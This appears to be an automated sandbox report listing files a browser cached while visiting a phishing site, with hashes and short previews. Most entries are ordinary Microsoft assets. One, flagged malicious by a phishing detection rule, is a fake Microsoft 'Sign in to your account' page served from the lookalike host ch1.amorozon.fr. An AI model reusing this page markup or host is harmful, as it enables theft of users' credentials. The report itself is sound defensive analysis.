Preview:	/!. jQuery JavaScript Library v1.10.2. * http://jquery.com/. . Includes Sizzle.js. * http://sizzlejs.com/. . Copyright 2005, 2013 jQuery Foundation, Inc. and other contributors. * Released under the MIT license. * http://jquery.org/license. . Date: 2013-07-03T13:48Z. */.!function(e,t){function n(e){var t=e.length,n=ct.type(e);return ct.isWindow(e)?!1:1===e.nodeType&&t?!0:"array"===n\|\|"function"!==n&&(0===t\|\|"number"==typeof t&&t>0&&t-1 in e)}function r(e){var t=kt[e]={};return ct.each(e.match(pt)\|\|[],function(e,n){t[n]=!0}),t}function i(e,n,r,i){if(ct.acceptData(e)){var o,a,s=ct.expando,u=e.nodeType,l=u?ct.cache:e,c=u?e[s]:e[s]&&s;if(c&&l[c]&&(i\|\|l[c].data)\|\|r!==t\|\|"string"!=typeof n){return c\|\|(c=u?e[s]=tt.pop()\|\|ct.guid++:s),l[c]\|\|(l[c]=u?{}:{"toJSON":ct.noop}),("object"==typeof n\|\|"function"==typeof n)&&(i?l[c]=ct.extend(l[c],n):l[c].data=ct.extend(l[c].data,n)),a=l[c],i\|\|(a.data\|\|(a.data={}),a=a.data),r!==t&&(a[ct.camelCase(n)]=r),"string"==typeof n?(o=a[n],null==o&&(o=

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\latest[1].eot Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Embedded OpenType (EOT), Segoe UI Semibold family
Category:	downloaded
Size (bytes):	30643
Entropy (8bit):	7.976822258863597
Encrypted:	false
SSDEEP:	768:UOtV1asJ9G0dAdnVrKX/HkVJRPvkgxYZ4Zoe:bLasJ9G0u0fk/RnkgxGof
MD5:	E812BA8B7E2A657F2B70CFACE93C7682
SHA1:	2F02CDDBB483F9B11BBBE74C3CA917A4C345FBAD
SHA-256:	3330C1DEAC468874238DD0C6BF902179A8731EDA8A208C7D01DAC0AB1EAE1BC9
SHA-512:	354B2DB12BC1D67F26F94352B0B663DAD64C46C107454FC19CFEA01C54BB09340BC26C06DE1B96FF826F5287CE246A6317722BAE41B72B63BA86FDAF844BA94E
Malicious:	false
Reputation:	low
IE Cache URL:	https://i.s-microsoft.com/fonts/segoe-ui/west-european/semibold/latest.eot?
Preview:	.w...v......................X.....LP#...B.............. ..........................".S.e.g.o.e. .U.I. .S.e.m.i.b.o.l.d.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .5...3.2...".S.e.g.o.e. .U.I. .S.e.m.i.b.o.l.d........H.P..lb.7^......U.D.-..iu...:4P\..GLFM.Y.#?.;..-...~}_).z{.rmD.1".$.....{.t.....=...!cK...%.~.....g........j.9S....6. ..n..V.]pz...e.....#X...=,.p.F..6&.VR...k$~J..n....7.......K.8..T.....x..J......#.J.XaQ.Q%_{3..xr.... 0Dm...k..Ep..........>..?Pk!KB..C...Q.q..1=6<,.S.F.&B..J.....ya2b."S.......6.2.......H........09A...Tb/.&.d..#.E.:.E.(..I5.M..444d.1........K..l...l.O..VBb...:..:b..Mh.'=4.d/..o.k.mMm........bx..!..S.@E.....>@:..k.JCas..7."..uG3hR.h..w..8W>.4.........pX....J..a....}.Y......(>H^=.`=.mg.!.....w'...J.<.ob..3A .../.....5%.'....XS0a......I.Ia....a...=..g..........{V1+.."_)7$2 O..!bb.=..\|.s.1..2qm..#.O......+E(I..1....EgQ.....E)R.m.?.8.q...J.G.@!f..n.F.r#..(..2p.?.9.8..?.d]..s..0.9.f..A...r.iq....x.g.aO....S.....R0i..BT.yl.".<k...:&Ja.\.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\latest[2].eot Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Embedded OpenType (EOT), Segoe UI family
Category:	downloaded
Size (bytes):	35047
Entropy (8bit):	7.975792390307888
Encrypted:	false
SSDEEP:	768:I6ibzTDpOGuAJ63YB9eSzDtQEspfAzyNyuBmOfAJYCM:/iPMYJ4GEAZoTyglcM
MD5:	CAD76E4816AF6890C9BFD02A6D1EA899
SHA1:	9EDC91541C31034FCE0D83AABBAAD4C314CD3D33
SHA-256:	D5794223D1A062E5DBE6C34C1994C8CE3792B24AFD5218D0644CB1F53DA4BE58
SHA-512:	24983A5856C2B4D8CBE2A4BD233A93B266A03D4218942E1D1733B33B65AB7A504AF0AC31DE2F1E69F6FF8CCD7A169CD4555539D34FFF8DE4CB8C98DB2DB2C863
Malicious:	false
Reputation:	low
IE Cache URL:	https://i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.eot?
Preview:	...=.............................LP#...B.............. ............................S.e.g.o.e. .U.I.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .5...3.2.....S.e.g.o.e. .U.I..........RV.z..;~......U.D.-..iu...N4P\..GLFM.Y.?.;..-...~~....Ox.M..".$.._..........g..sC2..4W.....9AGc.[a...rCl,..@..U_..L...e..Ru.J.-.f..3........S`.A........K<;...n.Y...rIi......([...W...5k..........^K.G...U.@....2H..B.)N0w.....C..9...........#.l2,4..6y.3$b....K.wx...l.$E..?3.8.c...,x..t.wa.O....4.c...!..+.<EM...2T.>\..]4.A.H.;..G......W.:.?...Z".....e....8....84.L,.)0..y.Xdd.Pa.@.&.o(.I.q.yF...[.y.m(D...(....T......,A.;q.....w.$..C..a.. .Y.O?{..0...'1.;C.,.......W..Q-..'.5tD@9..U...E4e.&_...S.Y...\)b.s.rIR.....%..R..KU O..{.0(......^Q\^!.et...Kf%..K...}.1...S.{........3p..]...\|Y...w..\|JeS$..k.....>(8 .ZlV..N.).c...Z.K.\..q.....'S.j...........9...._..E.#s*'#......[......DJ^.L7../1...+U.qG........-..MM..q....L..c...^...:e....<h...:..`.jz..fb.Ha.....k.....e\)g..\."..M

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\latest[3].eot Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Embedded OpenType (EOT), Segoe UI Light family
Category:	downloaded
Size (bytes):	28315
Entropy (8bit):	7.9724193003797
Encrypted:	false
SSDEEP:	384:+R0Z7+bHAtrQ1yBFbgqLct7rJhhPLLkHsrvSzaJu4mI3n5o+MmKCxDg6iT7jdVye:+uNUAtE3phPLLFTiMu+pxCjHyGEQ9zL
MD5:	17DFE73CB9C64527F7248B0A24DB317D
SHA1:	345198B9239FCDAF038FB2D3A919E4724037DBAA
SHA-256:	AD75FB92B2EBCE6C37640F03E1AB96A752F388BCE60C877ADE4780B13839E8C4
SHA-512:	421B56D93E9BD5E4B4449DD0FCDEE8D531087FD484C91530AAF0A67EDEA33D5AC2F14A7F4966C528C0F130F17F26629FCAB9F8AB47E950CEB5B9F1A827EA0728
Malicious:	false
Reputation:	low
IE Cache URL:	https://i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.eot?
Preview:	.n...m............................LP#...B.............. ............................S.e.g.o.e. .U.I. .L.i.g.h.t.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .5...3.2.....S.e.g.o.e. .U.I. .L.i.g.h.t..........K..e..66......U.D.-..iu...4P\..GLFM..C?.;..-...~\|...P..\.(..)RI.....>.>..CE..SsV.jPR...H.......].R..&.n.hT.......x.....q .......wA[....F.........c.".......Zed..>.?...`..3...B..W....R....F.j....v..'?.5.k^........+..a...).._].x.#QSi.....\|<t....k.;..Hv1.G...L$.9....5.t.:...V.Y.......\|.@....B.....P`..2.Z.0....2`.FR.MF8.x....GP0..$:.....PYm.22..."S."1.j[=.=.mR........j....&.4...k..].1@..y$......"y..C..g7..k.B...V..F\...G.m.jK ...O....b.Qlo...!.N.V....t.[..p.N..~@1d...YX.."....R_i.4.$j.P..U....u9...<..6..4%........9`.....S...N.Y..L..B$2\.E.vhe...n..h..5..Z..K?.H..S...2..=R..x.....EX.2......$."....It8..z.+.h ..$.2T....}Z../....p..b0ae.qq.(-v1..E.!.l".a..p.).;..8t..7..^..W...4A.D\eOb$......b.NI.Pe.#$.O38....,....g..&\|...B{...].....9..u.8..~Y...3.X..ff.,.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2[1].svg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	3651
Entropy (8bit):	4.094801914706141
Encrypted:	false
SSDEEP:	96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
MD5:	EE5C8D9FB6248C938FD0DC19370E90BD
SHA1:	D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256:	04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512:	C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious:	false
Reputation:	low
IE Cache URL:	https://acctcdn.msauth.net/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd[1].svg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	3651
Entropy (8bit):	4.094801914706141
Encrypted:	false
SSDEEP:	96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
MD5:	EE5C8D9FB6248C938FD0DC19370E90BD
SHA1:	D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256:	04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512:	C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious:	false
Reputation:	low
IE Cache URL:	https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/include/src/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\segring[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines
Category:	dropped
Size (bytes):	15226
Entropy (8bit):	4.158864911370039
Encrypted:	false
SSDEEP:	96:ktla8hrlWPvcY9f776h6aPTRfeaIRt7NOC+plsjnrzDkUuJdAg8Q70QYIrRl5UKg:zGrlq9m0kJwNPrzD7qdl0QpTZ8QlY
MD5:	C78E194A10BF6821B9EB076BA9C4625D
SHA1:	2BF7FEB5069F57C139A20ABC2839A4A2D05F9840
SHA-256:	9A7D1BBF11CDFFBAC6F21292D56E6D8F4EC393B0B30989576A096E86A7DE6F68
SHA-512:	A4EF68BCFC02BE81FC340E621998F22F6496B2D23F5FD481DEB1038C7C0D52C9E3B80CB7A4B0A1E4D8FBEDA46C2DD91D1C89D6E46F5B7F77DF46556BD3A4804A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_HtmlPhish_10, Description: Yara detected HtmlPhish_10, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\segring[1].htm, Author: Joe Security
Reputation:	low
Preview:	<!DOCTYPE html>.<html dir="ltr" class="" lang="en">..<head>. <title>Sign in to your account</title>. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="-1">. <meta http-equiv="x-dns-prefetch-control" content="on">. <meta name="PageID" content="ConvergedSignIn">. <meta name="SiteID" content="">. <meta name="ReqLC" content="1033">. <meta name="LocLC" content="en-US">. <link rel="shortcut icon" href="include/src/favicon_a_eupayfgghqiai7k9sol6lg2.ico">. <meta name="robots" content="none">. <link href="include/src/css.css" rel="stylesheet">. <script src="include/src/mp.js"></script>. . <script type="text/javascript">.function showIt() {. document.getElementById("div1").style.vis

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\signup[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	206847
Entropy (8bit):	4.959368164673686
Encrypted:	false
SSDEEP:	3072:MACWi7m/typbxBVBR3GHCBG/0xGPgFhogQy:MACWi7mEpdBVBR3GHCBG/0x4gF+y
MD5:	EFA1D5454EEF7A6378FD30E788065E46
SHA1:	25997E94D28159047FB15B4CB283D7A41C9D5C65
SHA-256:	D26EE3A000607295FD7527ADB598A9DB9E1B4D721097D8A328C37B2BD9DD1506
SHA-512:	1B108D8DD921B05B6111E36536B9F0E31BCD048BFC0C9E90C6DEAFD350F0CA17C104C346FD2A1C9A8B3F6AFC56C82583B814DA790089070EF98944F6C4CF97E0
Malicious:	false
Reputation:	low
Preview:	.. Copyright (C) Microsoft Corporation. All rights reserved. -->....<!DOCTYPE html>..<html lang="en" xml:lang="en" class="m_ul" dir="ltr" style="">.. <head>.. <link rel="preconnect" href="https://acctcdn.msauth.net" crossorigin>..<link rel="preconnect" href="https://acctcdn.msauth.net" crossorigin>..<meta http-equiv="x-dns-prefetch-control" content="on">..<link rel="dns-prefetch" href="//client.hip.live.com">..<link rel="dns-prefetch" href="//acctcdn.msauth.net">..<link rel="dns-prefetch" href="//acctcdn.msftauth.net">..<link rel="dns-prefetch" href="//acctcdnmsftuswe2.azureedge.net">..<link rel="dns-prefetch" href="//acctcdnvzeuno.azureedge.net">.... <title>Microsoft account</title>.. <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/><meta name="referrer" content="origin"/><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, minimum-scale=1.0, user-scalable=yes"/><meta name="format-detection" content="telephone=no"/>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\16-a6d48e[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines
Category:	downloaded
Size (bytes):	168617
Entropy (8bit):	5.044031875706024
Encrypted:	false
SSDEEP:	3072:OzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCx+:clZAXLkeeK1
MD5:	14118726CE8B08543CCC8AB2E04DC562
SHA1:	EFE07C71414808B69E2AE164B7F27318CDE1E7F1
SHA-256:	61F8827DF1C97E9A83B029B0D82CA425892D4F42CFA750016A932D7E86EB0B29
SHA-512:	44E1878C94EA4143D7D2AA373066F2727E740960F74A8A3E5A199A0E418B0B8E54240C17218A76E0E2B2056790EA66E20B57DC60B423EF0AA9F92E67BA0EDF33
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.microsoft.com/onerfstatics/marketingsites-eus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/96-1856db/3f-77d949/54-0a6279/71-437692/ec-444026/48-158efa/a4-817070/16-a6d48e?ver=2.0
Preview:	@charset "UTF-8";./! \| Copyright 2017 Microsoft Corporation \| This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise././! normalize.css v3.0.3 \| MIT License \| github.com/necolas/normalize.css /.body{margin:0}.context-uh

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\50-f1e180[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	133618
Entropy (8bit):	5.224613249025047
Encrypted:	false
SSDEEP:	3072:1f/HuFVppxvIeJ0i9d1EwgXA9JKi5DCE5n:1f/Hu/FIeRxn
MD5:	0405301724624162B6706F1AB465531F
SHA1:	1C034383716BCE493E28BFFF0DD2C27F049CC558
SHA-256:	A5DD3C05EFED81BBF60B618C070A7746F030147590EE0EDD74459AC4E53955FD
SHA-512:	9D81E61D3B0AED73F7A64D0344E432AEAAAB057655CFEB040348FA876693E618A434D63727F1E4AA1118276740C7102FD412637B46752665B78EB3C81A53915A
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.microsoft.com/onerfstatics/marketingsites-eus-prod/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/bb-d7480b/db-bc0148/dc-7e9864/6d-c07ea1/29-1ec5a9/23-c64e70/cd-23d3b0/6d-1e7ed0/b7-cadaa7/c4-898cf2/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/b2-7087f0/e5-08f1c0/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/50-f1e180?ver=2.0&iife=1
Preview:	(function(){/*. @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. /.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a[""]\|\|{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0\|\|r===1&&n[2]===".."\|\|n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u\|\|y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\app[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	262641
Entropy (8bit):	4.9463902181496096
Encrypted:	false
SSDEEP:	3072:u+Vd0pBbqPLYoyjFkxD2hAYwJb8ILm731Ss:u+Vd0DePLYoyjFkxD2hAYwJbZLM31Ss
MD5:	7C593B06759DB6D01614729D206738D6
SHA1:	0D4F76D10944933B8DDECFFE9691081439A77A3C
SHA-256:	F7D9FB0479DE843CF3FB0B78FC56BBB9E30BF0A238C6F79D9209FA8B22EFB574
SHA-512:	EF91B610CF17A17AAFB48984B4403EF175EB86096E3F12E23AE8D4C7C96EF60ED14DA3F69721E095CD2ACE3F0A06190186D000992823814BB906F7FB3576C2C1
Malicious:	false
Reputation:	low
IE Cache URL:	https://assets.onestore.ms/cdnfiles/external/oneui/oneui1.16.2/dist/css/app.css
Preview:	@font-face {. font-family: "wf_segoe-ui_normal";. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.eot");. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.eot?#iefix") format("embedded-opentype"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.woff") format("woff"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.ttf") format("truetype"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.svg#web") format("svg");. font-weight: normal;. font-style: normal; }..@font-face {. font-family: "wf_segoe-ui_light";. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.eot");. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.eot?#iefix") format("embedded-opentype"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.woff") format("woff"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.ttf") format("truetype

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410[1].svg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	513
Entropy (8bit):	4.720499940334011
Encrypted:	false
SSDEEP:	12:t4BdU/uRqv6DLfBHKFWJCDLfBSU1pRXIFl+MJ4bADc:t4TU/uRff0EcfIU1XXU+t2c
MD5:	A9CC2824EF3517B6C4160DCF8FF7D410
SHA1:	8DB9AEBAD84CA6E4225BFDD2458FF3821CC4F064
SHA-256:	34F9DB946E89F031A80DFCA7B16B2B686469C9886441261AE70A44DA1DFA2D58
SHA-512:	AA3DDAB0A1CFF9533F9A668ABA4FB5E3D75ED9F8AFF8A1CAA4C29F9126D85FF4529E82712C0119D2E81035D1CE1CC491FF9473384D211317D4D00E0E234AD97F
Malicious:	false
Reputation:	low
IE Cache URL:	https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/include/src/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><title>assets</title><path d="M18,11.578v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944.594.594L7.617,11.578Z" fill="#404040"/><path d="M10.944,7.056l.594.594L7.617,11.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4.944.071.07.071-.07.594-.595.071-.07-.071-.071L7.858,12.522H18.1V11.478H7.858l3.751-3.757.071-.071-.071-.07-.594-.595-.071-.07Z" fill="#404040"/></svg>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\dropdown_caret_KXSZjGsyILZaoTf0sI9X-A2[1].svg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	224
Entropy (8bit):	5.066130335315081
Encrypted:	false
SSDEEP:	6:tI9mc4slz2lWjVRqtmd9QA0ZcTKhqnR40Y:t44lWjVRqtnA0Zcq6R40Y
MD5:	2974998C6B3220B65AA137F4B08F57F8
SHA1:	F4F08DA689179DE68EE40CD12ECDCC5AC54B3979
SHA-256:	96D52BD03E244A44931A541A807067792D638DD29EC14A87A78F2BE85D12D19A
SHA-512:	6B4F2439CA99109A7C97828E5972A8E7C7FCA3745B2FB4738EBD9329A99234A8CD3BC4C0C48B5BAA917D4BAA64CDAEB5D74456DEFDDDA3E07FAA803283BE0287
Malicious:	false
Reputation:	low
IE Cache URL:	https://acctcdn.msauth.net/images/dropdown_caret_KXSZjGsyILZaoTf0sI9X-A2.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="36" height="36" viewBox="0 0 36 36"><title>assets</title><path d="M18,22.484l-8-8,.969-.968L18,20.547l7.031-7.031.969.968-8,8Z"/><rect width="36" height="36" fill="none"/></svg>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c[1].svg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	915
Entropy (8bit):	3.8525277758130154
Encrypted:	false
SSDEEP:	24:t4CvnAVRfFArf1QqCSzGUdiHTVtpRduf1QqCWbVHTVeUV0Uv6f1QqCWbVHTVeUVx:fn1r1QqC4GuiHFXS1QqCWRHQ3V1QqCWz
MD5:	2B5D393DB04A5E6E1F739CB266E65B4C
SHA1:	6A435DF5CAC3D58CCAD655FE022CCF3DD4B9B721
SHA-256:	16C3F6531D0FA5B4D16E82ABF066233B2A9F284C068C663699313C09F5E8D6E6
SHA-512:	3A692635EE8EBD7B15930E78D9E7E808E48C7ED3ED79003B8CA6F9290FA0E2B0FA3573409001489C00FB41D5710E75D17C3C4D65D26F9665849FB7406562A406
Malicious:	false
Reputation:	low
IE Cache URL:	https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/include/src/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#777777" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.107,0,0,1-.446.089A1.107,1.107,0,0,1,.7,9.054a1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893A1.164,1.164,0,0,1,.7,6.946a1.107,1.107,0,0,1,.446-.089M8,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,8,6.857m6.857,0a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,14.857,6.857Z"/></svg>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\ellipsis_white_5ac590ee72bfe06a7cecfd75b588ad73[1].svg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	915
Entropy (8bit):	3.877322891561989
Encrypted:	false
SSDEEP:	24:t4CvnAVRf83f1QqCSzGUdiHTVtpRduf1QqCWbVHTVeUV0Uv6f1QqCWbVHTVeUV0W:fnL1QqC4GuiHFXS1QqCWRHQ3V1QqCWRV
MD5:	5AC590EE72BFE06A7CECFD75B588AD73
